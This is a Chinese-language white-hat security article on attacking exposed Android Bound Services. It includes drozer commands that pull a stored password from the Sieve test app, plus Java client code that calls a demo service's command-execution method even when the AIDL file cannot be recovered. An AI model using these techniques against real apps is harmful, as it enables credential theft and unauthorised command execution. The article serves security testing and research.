去年12月,【1】 讲述了针对android bound service的攻击方法,给出了从apk包中恢复AIDL文件的工具,利用AIDL便可以编写攻击Bound Service的Client。拜这篇文章所赐,笔者也在实际测试工作中发现了类似漏洞,其中的过程却有些曲折。作为白帽子,通常情况下很难直接得到或者恢复AIDL文件,这决定了Bound Service的易守难攻,因此需要更加系统地掌握Bound Sercive的测试方法,并辅以耐心和一定的运气,才能发现类似的漏洞。在【1】的基础上,本文将分享此类漏洞的经验,进一步对Bound Service攻击进行说明。
Bound Service提供了一种基于Binder的跨进程调用(IPC)机制,在其Service类中实现OnBind方法并返回用于IPC的IBinder对象。根据官方文档【2】,实现Bound Service有以下三种方式:
由于第一种方式主要在同一进程中使用,因此我们主要关注后两种情况,只要Bound Service暴露,那么便可以编写恶意app,通过Messenger和基于AIDL的Bound Service进行跨进程通信,传入污染的数据或者直接调用被攻击应用的功能,最终对安全产生非预期的影响。
#!java /** 36 * Create a new Messenger pointing to the given Handler. Any Message 37 * objects sent through this Messenger will appear in the Handler as if 38 * [email protected]
Handler#sendMessage(Message) Handler.sendMessage(Message)} had 39 * been called directly. 40 * 41 * @param target The Handler that will receive sent messages. 42 */ 43 public Messenger(Handler target) { 44 mTarget = target.getIMessenger(); 45 } /** 140 * Create a Messenger from a raw IBinder, which had previously been 141 * retrieved with [email protected] #getBinder}. 142 * 143 * @param target The IBinder this Messenger should communicate with. 144 */ 145 public Messenger(IBinder target) { 146 mTarget = IMessenger.Stub.asInterface(target); 147 }
#!bash dz> run app.service.info -a com.mwr.example.sieve Package: com.mwr.example.sieve com.mwr.example.sieve.AuthService Permission: null com.mwr.example.sieve.CryptoService Permission: null
#!java public void handleMessage(Message msg) { ... Bundle v8 = null; int v7 = 9234; int v6 = 7452; AuthService.this.responseHandler = msg.replyTo; Object v2 = msg.obj; switch(msg.what) { case 4: { //Check if pin and password are set } case 2354: { if(msg.arg1 == v6) { //Return pin Requires password from Bundle } else if(msg.arg1 == v7) { //Return password Requires pin from Bundle!! v1 = 41; if(AuthService.this.verifyPin(((Bundle)v2).getString("com.mwr.example.sieve.PIN")) ) { v2_1 = new Bundle(); v2_1.putString("com.mwr.example.sieve.PASSWORD", AuthService.this.getKey()); v3 = 0; } ... this.sendResponseMessage(5, v1, v3, v2_1); return; label_57: this.sendUnrecognisedMessage(); break; } case 6345: { if(msg.arg1 == v6) { //Set Password Requires Current Password from Bundle v1 = 42; v3 = AuthService.this.setKey(((Bundle)v2).getString("com.mwr.example.sieve.PASSWORD")) ? 0 : 1; } else if(msg.arg1 == v7) { //Set Pin Requires Current Pin from Bundle v1 = 41; v3 = AuthService.this.setPin(((Bundle)v2).getString("com.mwr.example.sieve.PIN")) ? 0 : 1; } else { goto label_99; } this.sendResponseMessage(4, v1, v3, v8); return;
#!bash dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 0 --extra string com.mwr.example.sieve.PIN 1234 --bundle-as-obj Got a reply from com.mwr.example.sieve/com.mwr.example.sieve.AuthService: what: 5 arg1: 41 arg2: 0 Extras com.mwr.example.sieve.PASSWORD (String) : passw0rd123123123
#!bash dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 33333 --extra string com.mwr.example.sieve.PIN 2344 --bundle-as-obj Got a reply from com.mwr.example.sieve/com.mwr.example.sieve.AuthService: what: 5 arg1: 41 arg2: 1 Extras com.mwr.example.sieve.PIN (String) : 2344
文献【1】给出了一个存在命令执行漏洞的Bound Service,并根据Bound Service的apk生成AIDL接口文件,编写攻击程序调用Bound Service中的命令执行方法。然而,在使用中发现生成AIDL文件的工具主要根据smali文件中的Stub.Proxy类进行抓取,而当apk进行了混淆,便不能正确生成AIDL文件了。例如,我们配置build.gradle中的minifyEnabledtrue开关为true,使用Android Studio的默认混淆规则。对混淆的apk与未混淆的apk使用JEB逆向对比如下
混淆后的apk少了许多有关AIDL的信息,没有了Stub Proxy这些特征,致使如下代码实现的GenerateAIDL工具出错
#!java if (descriptorToDot(interfaces.first()).equals(IINTERFACE_CLASS)) { /* Now grab the Stub.Proxy, to get the protocols */ String stubProxyName = className + ".Stub.Proxy"; DexBackedClassDef stubProxyDef = getStubProxy(classDefs, stubProxyName); if (stubProxyDef == null) { System.err.println("[ERROR] Unable to find Stub.Proxy for class: " + stubProxyName + ", Skiping!"); continue; }
#!java // in fact a is TestInterface public interface a extends IInterface { static final String DESCRIPTOR = "com.jakev.boundserver.aidl.TestInterface"; String a(String arg1) throws RemoteException; }
#!java public class Stub extends Binder implements a { /** Construct the stub at attach it to the interface. */ public Stub() { super(); this.attachInterface(this, DESCRIPTOR); } /** Cast an IBinder object into an TestInterface(a) interface, * generating a proxy if needed */ public static a asInterface(IBinder obj) { if (obj == null) { return null; } IInterface iin = obj.queryLocalInterface(DESCRIPTOR); if(((iin != null) && (iin instanceof a))) { return (a)iin; } return new Stub.Proxy(obj); } public IBinder asBinder() { return this; } public boolean onTransact(int code, Parcel data, Parcel reply, int flag) throws RemoteException{ boolean v0 = true; switch(code) { case 1: { data.enforceInterface(DESCRIPTOR); String v1 = this.a(data.readString()); reply.writeNoException(); reply.writeString(v1); break; } case 1598968902: { reply.writeString(DESCRIPTOR); break; } default: { v0 = super.onTransact(code, data, reply, flag); break; } } return v0; } public String a(String cmd) throws RemoteException { // Server do not have to implement this method, just return null return null; } private static class Proxy implements a { private IBinder mRemote; Proxy(IBinder remote) { mRemote = remote; } @Override public IBinder asBinder() { return mRemote; } public String getInterfaceDescriptor() { return DESCRIPTOR; } @Override public String a(String cmd) throws RemoteException{ String result = null; Parcel data = Parcel.obtain(); Parcel reply = Parcel.obtain(); try { data.writeInterfaceToken(DESCRIPTOR); data.writeString(cmd); mRemote.transact(1, data, reply, 0); reply.readException(); result = reply.readString(); } finally { reply.recycle(); data.recycle(); } return result; } } }
#!java mServiceConnection = new myServiceConnection(); Intent i = new Intent(); i.setClassName("com.jakev.boundserver", "com.jakev.boundserver.ITestService"); boolean ret = bindService(i, mServiceConnection, BIND_AUTO_CREATE);
#!java public void onServiceConnected(ComponentName name, IBinder service) { Log.d(TAG, "OnServiceConnected "); String command = editCommand.getText().toString(); try { a mTestService = Stub.asInterface(service); String result = mTestService.a(command); Log.d(TAG, "exec result is:" + result); txtResult.setText(result); } catch (RemoteException e) { e.printStackTrace(); } }
至此,就完成了不依赖于AIDL文件攻击Bound Service的过程。
通过adb shell service list可以查看在context manager(或servicemanager)中注册的系统服务名称和IBinder接口。
#!java sp<IServiceManager> sm = defaultServiceManager(); sp<IBinder> binder = sm->getService(String16("demo")); //demo is Service Name sp<IDemo> ServiceName = interface_cast<IDemo>(binder);
构造Parcel对象data后,则可以通过 binder->transact(int code, Parcel data, Parcel reply, int flag)
一般情况下,系统服务都有严格的权限检查机制,漏洞更是罕见,但也有案例。 如, 三星手机随意访问RILD接口(可以解除定制机网络制式的软限制) ,作者在POC中给两种访问ITelephony服务sendOemRilRequestRaw接口的方法(Java和C)。